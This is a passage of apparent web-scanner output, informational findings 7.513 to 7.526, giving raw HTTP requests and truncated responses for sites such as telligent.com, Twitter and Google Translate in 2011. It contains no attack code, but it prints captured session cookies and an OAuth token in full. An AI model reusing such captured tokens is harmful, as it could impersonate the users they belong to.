Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a49+GMT; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53647277.670287554.1298757602.1298757602.1298757602.1; __utmc=53647277; __utmb=53647277.1.10.1298757602

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Wed, 22 Jul 2009 15:41:56 GMT
Accept-Ranges: bytes
ETag: "0fa41f1e2aca1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a53+GMT; expires=Sun, 26-Feb-2012 22:04:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:53 GMT
Content-Length: 821

GIF89a.......FFFGGGIIIJJJKKKMMMNNNOOOQQQRRRTTTUUUWWWXXXYYYZZZ...........................................................................................................................................
...[SNIP]...

7.513. http://telligent.com/themes/generic/css/layout.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/generic/css/layout.css

Request

GET /themes/generic/css/layout.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Tue, 15 Jun 2010 15:42:56 GMT
Accept-Ranges: bytes
ETag: "040836ca1ccb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a38+GMT; expires=Sun, 26-Feb-2012 22:04:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:38 GMT
Content-Length: 14802

....page-management-header { }
.page-management { text-align: left; font-family: Arial, Helvetica !important; font-size: 12px !important; position: relative; border-top: solid 2px #aaa; background-co
...[SNIP]...

7.514. http://telligent.com/themes/groups/fiji/css/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /themes/groups/fiji/css/DynamicStyle.aspx

Request

GET /themes/groups/fiji/css/DynamicStyle.aspx?SectionID=691&AppType=ContentManagement HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Cache-Control: public
Expires: Sat, 26 Feb 2011 22:34:39 GMT
Last-Modified: Sat, 26 Feb 2011 22:04:39 GMT
ETag: 634343546792877518
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT; expires=Sun, 26-Feb-2012 22:04:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:39 GMT
Content-Length: 0


7.515. http://telligent.com/utility/jquery/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /utility/jquery/jquery-1.3.2.min.js

Request

GET /utility/jquery/jquery-1.3.2.min.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 19 Mar 2009 19:18:22 GMT
Accept-Ranges: bytes
ETag: "093e177c7a8c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a45+GMT; expires=Sun, 26-Feb-2012 22:04:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:44 GMT
Content-Length: 57254

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

7.516. http://telligent.com/utility/loading.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /utility/loading.htm

Request

GET /utility/loading.htm HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 03 Nov 2008 23:00:18 GMT
Accept-Ranges: bytes
ETag: "0eda7f073ec91:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a14+GMT; expires=Sun, 26-Feb-2012 23:21:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:14 GMT
Connection: close
Content-Length: 454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

7.517. http://trafficshaping.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trafficshaping.com
Path:   /

Request

GET / HTTP/1.1
Host: trafficshaping.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; expires=Sun, 27-Feb-2011 18:32:11 GMT; path=/; domain=.trafficshaping.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:32:10 GMT
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8066

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>TrafficShaping - The URL Shortener for Online Marketers</title>
<meta name="des
...[SNIP]...

7.518. http://trafficshaping.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trafficshaping.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: trafficshaping.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; MintAcceptsCookies=1; __switchTo5x=95; __unam=d903aed-12e67f689b8-53801d6e-1; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.1.10.1298824334; MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:16 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:32:15 GMT
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3330

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title></title>
<link rel="stylesheet" href="/_css/screen.css" type="text/css" med
...[SNIP]...

7.519. http://trafficshaping.com/seo-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trafficshaping.com
Path:   /seo-tools

Request

GET /seo-tools HTTP/1.1
Host: trafficshaping.com
Proxy-Connection: keep-alive
Referer: http://trafficshaping.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; MintAcceptsCookies=1; __switchTo5x=95; __unam=d903aed-12e67f689b8-53801d6e-1; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.1.10.1298824334; MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:42:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:42:17 GMT
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 7045

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>TrafficShaping - The URL Shortener for SEO and SEM professionals</title>
<meta
...[SNIP]...

7.520. http://translate.google.com/translate_a/element.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Request

GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1
Host: translate.google.com
Proxy-Connection: keep-alive
Referer: http://www.atlanticyachtandship.com/about_us.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; __utmx=173272373.; __utmxx=173272373.; S=static_files=8yY1lAZwM4I; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298825250:GM=1:SG=1:S=V1WqkG1FP-Wv5l77

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:15 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Pragma: no-cache
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298825535:GM=1:SG=1:S=cY0eetI1FoLIE15c; expires=Tue, 26-Feb-2013 16:52:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1414

(function(){var d=window,e=document;function f(b){var a=e.getElementsByTagName("head")[0];a||(a=e.body.parentNode.appendChild(e.createElement("head")));a.appendChild(b)}function _loadJs(b){var a=e.cre
...[SNIP]...

7.521. http://translate.googleapis.com/translate_a/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Request

GET /translate_a/l?client=te&hl=en&cb=_callbacks_._0gko76zr4 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.atlanticyachtandship.com/about_us.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:25 GMT
Expires: Sun, 27 Feb 2011 16:52:25 GMT
Cache-Control: private, max-age=86400
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=bace953cae8e41f4:TM=1298825545:LM=1298825545:S=0k90awwHdzuecXIw; expires=Tue, 26-Feb-2013 16:52:25 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1717

_callbacks_._0gko76zr4({'sl':{'auto':'Detect language','af':'Afrikaans','sq':'Albanian','ar':'Arabic','be':'Belarusian','bg':'Bulgarian','ca':'Catalan','zh-CN':'Chinese','hr':'Croatian','cs':'Czech','
...[SNIP]...

7.522. http://twitter.com/favorites/tap11.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /favorites/tap11.json

Request

GET /favorites/tap11.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1298985414032=cachebust HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://tap11.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129797651447110140; k=173.193.214.243.1298770536066098; __utmz=43838368.1298770586.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=cloudscan.us; __utma=43838368.1964851609.1298770586.1298770586.1298770586.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:16:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1298985364-86410-59278
X-RateLimit-Limit: 150
ETag: "c640e53f651ccf5a8eb19652b1deda00"-gzip
Last-Modified: Tue, 01 Mar 2011 13:16:04 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.03566
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1298988963
Set-Cookie: original_referer=4bfz%2B%2BmebEmmOypgvjcFrI76cp%2F0VW5A; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHWqj3EuAToHaWQiJTliZjVlZWNlYjcwMmE5%250AN2VkYjZkYjlhMDA2ODY3NjA4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--eb6e381c39a91f92b27879678f8c10d692719995; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 36188

TWTR.Widget.receiveCallback_1([{"in_reply_to_screen_name":"asabiliaAR","text":"@asabiliaAR well then try something else, there are plenty of great Twitter tools! My suggestion? Check out @tap11","in_r
...[SNIP]...

7.523. http://twitter.com/watchmouse/status/35359711327031296  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /watchmouse/status/35359711327031296

Request

GET /watchmouse/status/35359711327031296 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=8&ved=0CEEQFjAH&url=http%3A%2F%2Ftwitter.com%2Fwatchmouse%2Fstatus%2F35359711327031296&rct=j&q=cloudscan.us&ei=S6ppTdzONoK8lQfrkr2KAg&usg=AFQjCNHUhjm6NNS-3QGMZa540A7qhvs2kA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129797651447110140

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:35:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1298770536-79169-19430
ETag: "36033f580cdc853c663584246c9ef65c"-gzip
Last-Modified: Sun, 27 Feb 2011 01:35:36 GMT
X-Runtime: 0.02088
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1298770536315783; path=/; expires=Sun, 06-Mar-11 01:35:36 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr%2BUxdELy7AFpd52wlD6Ai4%2BRl8O3DFZoKLZg858lnIfp43%2FWLidCFA5mNSI%2FRvUb8hxdxwZNYHhiSwzOlwUcYUTxj3Pwm8hMBByLSDmGGpBEFwKJp3dI7AbWDT7Up5VbFvStRTUBkN6Vd1ttw6jINj4WAmu6LDz0GyP%2BZmVHrg9ehDYQiNCWCoAMQVGlXQrNUbE5QURX6wzYlTHPBAz6JkEeTmdqNCC4xX%2BrCjOO1%2BK4%2BX%2Fb%2BS1Cv2WyaEFNU9mL91noomz3GdQogo7IcG1025P%2FGAcmLi9nV8%3D; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlM2JiMjU1MDMzN2FhNGZjOWUyOTMxZjE0MjAwZDM3%250AMjU6DnJldHVybl90byI7aHR0cDovL3R3aXR0ZXIuY29tL3dhdGNobW91c2Uv%250Ac3RhdHVzLzM1MzU5NzExMzI3MDMxMjk2Og9jcmVhdGVkX2F0bCsIhqfBZC4B%250AOgdpZCIlMTIxMmVkZmFjYjZiY2RmY2E1Yzg1OGY1MjdjYzI0NzgiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--a56fd5fa21484e56ee16d6c34ca9b72d6e10c10a; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 10016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

7.524. https://twitter.com/oauth/authenticate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /oauth/authenticate

Request

GET /oauth/authenticate?oauth_token=RY9pXmKSYCHn4ZOq4lHvegoli01DxbPGl4swXkb0iQ HTTP/1.1
Host: twitter.com
Connection: keep-alive
Referer: http://klout.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129797651447110140; k=173.193.214.243.1298770536066098; __utmz=43838368.1298770586.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=cloudscan.us; __utma=43838368.1964851609.1298770586.1298770586.1298770586.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:57:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1298948244-99085-34217
ETag: "61acb31485bfecfac0f4f92f3b8e6eb2"-gzip
Last-Modified: Tue, 01 Mar 2011 02:57:24 GMT
X-Runtime: 0.01301
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=il7XRY41jHkSWESiWNTCujy9Toi1xC1W; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWQ2NzQ3NGE5Y2YxM2ViMGVjYTJhYjhiZTRmMmQy%250AYWQ6DnJldHVybl90byJiaHR0cHM6Ly90d2l0dGVyLmNvbS9vYXV0aC9hdXRo%250AZW50aWNhdGU%252Fb2F1dGhfdG9rZW49Ulk5cFhtS1NZQ0huNFpPcTRsSHZlZ29s%250AaTAxRHhiUEdsNHN3WGtiMGlROg9jcmVhdGVkX2F0bCsII0VZby4BOgdpZCIl%250ANWYzNWNhOGI1OTJhM2JhZmU5YWQ5YjA2MTU5ODgwOGEiCmZsYXNoSUM6J0Fj%250AdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--e711b42fd4829d2613b878aeeaf6908dcd08e937; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 6995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta c
...[SNIP]...

7.525. http://REDACTED/iaction/00asup_HomePortal_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://REDACTED
Path:   /iaction/00asup_HomePortal_1

Request

GET /iaction/00asup_HomePortal_1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: REDACTED

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 648
Content-Type: text/html
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001298912249-11856381; expires=Wednesday, 27-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=6305C1A54774467CBBD6A987A4642EF2; expires=Friday, 16-Sep-2011 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Mon, 28 Feb 2011 16:57:29 GMT

<html><body><img src="http://ec.redcated/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ad.bizo.com/pixel?id=562914&t=2" width="1" height="1" border="0" /><img src="http://ads.c
...[SNIP]...

7.526. http://widgets.causes.com/badges/cause  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.causes.com
Path:   /badges/cause

Request

GET /badges/cause?cause_id=539326&faces=1&height=208&width=312&tagline=support+our+cause HTTP/1.1
Host: widgets.causes.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 304 Not Modified
Connection: close
Date: Sun, 27 Feb 2011 02:31:06 GMT
